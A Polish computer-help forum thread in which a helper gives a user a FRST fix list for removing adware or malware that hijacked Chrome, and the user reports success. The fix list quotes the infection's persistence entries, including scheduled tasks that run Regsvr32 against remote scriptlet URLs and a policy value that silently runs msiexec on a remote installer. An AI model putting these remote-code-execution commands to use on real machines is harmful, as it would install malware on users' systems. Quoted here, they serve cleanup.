Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Niepokojąca wtyczka w przeglądarce.

NastyChoco 19 Kwi 2017 15:43 813 2
  • #2 19 Kwi 2017 15:52
    Kolobos
    Spec od komputerów

    Zgraj zakladki z Chrome.

    Odinstaluj:
    McAfee Security Scan Plus
    Google Chrome

    Uzyj: https://sourceforge.net/projects/adobeflashup...an%20Remover/RemoveMcAfee_silent.exe/download

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    Task: {41B64674-6EF7-46D3-82B5-B0D686CE3078} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.yzsgrwz.com/?data=zDlkMj1SFUY2OWE8NUFxMUM3MUUxNjZLMjF3N8M4NdQYMTNSNc== scrobj.dll
    Task: {51DDA022-D02A-4F1C-919E-E480A7BAAEBD} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://7c8ogu7.x.incapdns.net/?data=zDlkMj1SFUY2OWE8NUFxMUM3MUUxNjZLMjF3N8M4NdQYMTNSNc== scrobj.dll
    Task: {E082BF24-942E-4822-8B15-F6128CB3DEAF} - System32\Tasks\Opera scheduled Autoupdate 1410784226 => C:\Program Files (x86)\Opera\launcher.exe [2017-02-27] (Opera Software)
    Shortcut: C:\Users\NastyChoco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\NastyChoco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    C:\Program Files (x86)\Eastness\
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [322]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [322]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [322]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [322]
    AlternateDataStreams: C:\Users\NastyChoco\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\Users\NastyChoco\Dane aplikacji:NT2 [322]
    AlternateDataStreams: C:\Users\NastyChoco\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\NastyChoco\AppData\Roaming:NT2 [322]
    Hosts:
    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\Run: [AceStream] => C:\Users\NastyChoco\AppData\Roaming\ACEStream\engine\ace_engine.exe
    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj1SFUY2OWE8NUFxMUM3MUUxNjZLMjF3N8M4NdQYMTNSNc== /q




    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\MountPoints2: {19cd0ba9-4a29-11e4-8264-54271ee72180} - "E:\LGAutoRun.exe"
    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\MountPoints2: {30aed2f5-410d-11e4-8260-54a05063196b} - "F:\psLauncher.exe" /autorun
    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\MountPoints2: {6e1cfcf9-9d48-11e6-82a9-54271ee72180} - "E:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\MountPoints2: {99df2230-c824-11e6-82b3-54271ee72180} - "E:\HiSuiteDownLoader.exe"
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-03-30]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    Tcpip\..\Interfaces\{41AE9643-D840-4438-AB47-CDB011CF07F4}: [DhcpNameServer] 7.254.254.254
    RemoveProxy:
    BHO: Brak nazwy -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> Brak pliku
    FF HKU\S-1-5-21-442994064-1704932400-2607866040-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\NastyChoco\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => nie znaleziono
    FF Plugin HKU\S-1-5-21-442994064-1704932400-2607866040-1001: @acestream.net/acestreamplugin,version=3.1.15 -> C:\Users\NastyChoco\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-442994064-1704932400-2607866040-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\NastyChoco\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
    CHR HKU\S-1-5-21-442994064-1704932400-2607866040-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    2017-04-17 16:16 - 2017-04-17 16:16 - 00000000 ____D C:\Program Files (x86)\temp
    2017-04-17 16:12 - 2017-04-18 20:07 - 00000000 ____D C:\Windows\system32\log
    2017-04-17 16:12 - 2017-04-17 16:12 - 00000000 ____D C:\Users\NastyChoco\AppData\Local\Eastness
    2017-04-17 16:12 - 2017-04-17 16:12 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 16:12 - 2017-04-17 16:12 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\Users\NastyChoco\AppData\Local\Kitty
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 16:09 - 2017-04-17 16:10 - 00000000 ____D C:\Users\NastyChoco\AppData\Local\SNARE
    2017-04-17 16:05 - 2017-04-17 16:09 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-14 16:45 - 2017-04-14 16:45 - 00003586 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-14 16:44 - 2017-04-14 16:44 - 00000000 ____D C:\Users\NastyChoco\AppData\Roaming\SSMgre
    2017-04-10 11:59 - 2017-04-14 16:45 - 00003576 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
    2017-04-19 07:28 - 2015-01-13 16:33 - 00000000 ____D C:\AdwCleaner
    2017-03-30 15:10 - 2017-03-04 21:27 - 00001982 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
    2017-03-30 15:10 - 2017-03-04 21:27 - 00000000 ____D C:\Program Files\McAfee Security Scan
    EmptyTemp:

    W FRST wybierz Napraw.

    0
  • #3 19 Kwi 2017 18:23
    NastyChoco
    Poziom 2  

    Pomogło, dzięki!

    0